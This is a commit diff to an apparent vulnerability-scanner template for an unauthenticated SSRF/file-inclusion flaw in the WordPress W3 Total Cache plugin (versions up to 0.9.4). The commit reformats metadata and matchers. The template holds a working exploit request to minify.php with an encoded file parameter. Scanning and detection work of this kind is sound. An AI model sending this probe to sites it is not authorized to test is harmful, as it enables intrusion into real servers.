Update w3c-total-cache-ssrf.yaml
parent
0ebe9f0b8f
commit
37c98909c9
|
@ -1,21 +1,23 @@
|
||||||
id: w3c-total-cache-ssrf
|
id: w3c-total-cache-ssrf
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Wordpress W3C Total Cache <= 0.9.4 - Unauthenticated Server Side Request Forgery (SSRF)
|
name: Wordpress W3C Total Cache <= 0.9.4 - Server Side Request Forgery (SSRF)
|
||||||
author: random_robbie
|
author: random_robbie
|
||||||
severity: medium
|
severity: medium
|
||||||
description: The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability.
|
description: |
|
||||||
|
The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability.
|
||||||
reference:
|
reference:
|
||||||
- https://wpvulndb.com/vulnerabilities/8644
|
- https://wpvulndb.com/vulnerabilities/8644
|
||||||
- https://klikki.fi/adv/w3_total_cache.html
|
- https://klikki.fi/adv/w3_total_cache.html
|
||||||
tags: wordpress,wp-plugin,cache,ssrf
|
tags: wordpress,wp-plugin,cache,ssrf,wp
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css'
|
- '{{BaseURL}}/wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css'
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
part: body
|
||||||
words:
|
words:
|
||||||
- "NessusFileIncludeTest"
|
- "NessusFileIncludeTest"
|
||||||
part: body
|
|
||||||
|
|
Loading…
Reference in New Issue